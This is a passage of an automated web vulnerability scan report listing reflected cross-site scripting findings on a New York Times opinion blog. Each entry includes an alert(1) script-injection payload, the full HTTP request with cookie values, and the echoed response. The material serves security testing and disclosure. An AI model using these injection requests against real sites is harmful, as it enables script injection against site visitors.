<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhousea8e10\"><script>alert(1)</script>f92f7baf431&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.202. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/linda-greenhouse/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9c99"><script>alert(1)</script>050246b50c5 was submitted in the REST URL parameter 3. This input was echoed as e9c99\"><script>alert(1)</script>050246b50c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhouse/feede9c99"><script>alert(1)</script>050246b50c5/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:17:45 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:17:45 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhouse/feede9c99\"><script>alert(1)</script>050246b50c5&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.203. http://opinionator.blogs.nytimes.com/category/linda-greenhouse/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/linda-greenhouse/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e088"><script>alert(1)</script>01f52420557 was submitted in the REST URL parameter 3. This input was echoed as 4e088\"><script>alert(1)</script>01f52420557 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/linda-greenhouse/page4e088"><script>alert(1)</script>01f52420557/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:21:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:21:24 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43932

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/linda-greenhouse/page4e088\"><script>alert(1)</script>01f52420557/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.204. http://opinionator.blogs.nytimes.com/category/line-by-line [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/line-by-line

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload afa55"><script>alert(1)</script>4debbb31b46 was submitted in the REST URL parameter 2. This input was echoed as afa55\"><script>alert(1)</script>4debbb31b46 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-lineafa55"><script>alert(1)</script>4debbb31b46 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:48 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:48 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-lineafa55\"><script>alert(1)</script>4debbb31b46&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.205. http://opinionator.blogs.nytimes.com/category/line-by-line/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/line-by-line/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b31d"><script>alert(1)</script>e2325ab679c was submitted in the REST URL parameter 2. This input was echoed as 7b31d\"><script>alert(1)</script>e2325ab679c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line7b31d"><script>alert(1)</script>e2325ab679c/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:27:26 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:27:26 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line7b31d\"><script>alert(1)</script>e2325ab679c&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.206. http://opinionator.blogs.nytimes.com/category/line-by-line/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/line-by-line/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a188"><script>alert(1)</script>b9dda51b1a3 was submitted in the REST URL parameter 3. This input was echoed as 5a188\"><script>alert(1)</script>b9dda51b1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line/feed5a188"><script>alert(1)</script>b9dda51b1a3/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:24:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:24:29 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line/feed5a188\"><script>alert(1)</script>b9dda51b1a3&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.207. http://opinionator.blogs.nytimes.com/category/line-by-line/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/line-by-line/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9994f"><script>alert(1)</script>08ffe0e76da was submitted in the REST URL parameter 3. This input was echoed as 9994f\"><script>alert(1)</script>08ffe0e76da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/line-by-line/page9994f"><script>alert(1)</script>08ffe0e76da/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:26:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:26:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43888

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/line-by-line/page9994f\"><script>alert(1)</script>08ffe0e76da/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.208. http://opinionator.blogs.nytimes.com/category/living-rooms [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/living-rooms

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68da3"><script>alert(1)</script>6b77f45f4e6 was submitted in the REST URL parameter 2. This input was echoed as 68da3\"><script>alert(1)</script>6b77f45f4e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms68da3"><script>alert(1)</script>6b77f45f4e6 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:29:15 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:29:15 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43811

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms68da3\"><script>alert(1)</script>6b77f45f4e6&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.209. http://opinionator.blogs.nytimes.com/category/living-rooms/feed/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/living-rooms/feed/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4427"><script>alert(1)</script>ffaa5e8cd26 was submitted in the REST URL parameter 3. This input was echoed as b4427\"><script>alert(1)</script>ffaa5e8cd26 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms/feedb4427"><script>alert(1)</script>ffaa5e8cd26/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:25:50 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms/feedb4427\"><script>alert(1)</script>ffaa5e8cd26&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,Fr
...[SNIP]...

3.210. http://opinionator.blogs.nytimes.com/category/living-rooms/page/2/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/living-rooms/page/2/

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e15ad"><script>alert(1)</script>84073c0dd72 was submitted in the REST URL parameter 3. This input was echoed as e15ad\"><script>alert(1)</script>84073c0dd72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/living-rooms/pagee15ad"><script>alert(1)</script>84073c0dd72/2/ HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
Date: Sat, 13 Nov 2010 02:31:35 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://opinionator.blogs.nytimes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 13 Nov 2010 02:31:35 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43808

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
<script src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=blog.nytimes.com/opinionator/category/living-rooms/pagee15ad\"><script>alert(1)</script>84073c0dd72/2&posall=TopAd,Bar1,Position1,Position1B,Top5,SponLink,SponLink2,MiddleRight,Box1,Box3,Bottom3,Right5A,Right6A,Right7A,Right8A,Middle1C,Bottom7,Bottom8,Bottom9,Inv1,Inv2,Inv3,CcolumnSS,Middle4,Left1B,
...[SNIP]...

3.211. http://opinionator.blogs.nytimes.com/category/peter-orszag [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://opinionator.blogs.nytimes.com
Path:   /category/peter-orszag

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56ee1"><script>alert(1)</script>2199c3904e8 was submitted in the REST URL parameter 2. This input was echoed as 56ee1\"><script>alert(1)</script>2199c3904e8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /category/peter-orszag56ee1"><script>alert(1)</script>2199c3904e8 HTTP/1.1
Host: opinionator.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: adxcs=-|s*17817=0:1|s*244eb=0:1|s*1fb54=0:1|s*1fb59=0:2; NYT_GR=4cddf249-6E1Bts/K0e0zNBM+N9XbaQ; __utmz=55084533.1289612657.1.1.utmcsr=nytimes.com|utmccn=(referral)|utmcmd=referral|utmcct=/; zFD=ABDAABC3AB810AB0E30A00E03; news_people_toolbar=NO; up=AB8GAb1e20SA09Nj; rsi_segs=H07707_10387|H07707_10456|H07707_10493|H07707_10707|H07707_10794; WT_FPC=id=174.122.23.218-4005892592.30114498:lv=1289616253560:ss=1289616226962; nyt-m=3FDC4A193A77D64F91C20FEFB1A1FC39&e=i.1291179600&t=i.3&v=i.0&l=l.15.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1.-1&n=i.1; zFN=ABDAABC3AB810AB0E30A00E03; RMID=00c3216817494cddd04d311a; __utma=55084533.1198630239.1289612653.1289612653.1289612653.1; __utmc=55084533; ups=ABD1gU1d20SA06nv; __utmb=55084533.1.10.1289612653;

Response

HTTP/1.1 404 Not Found
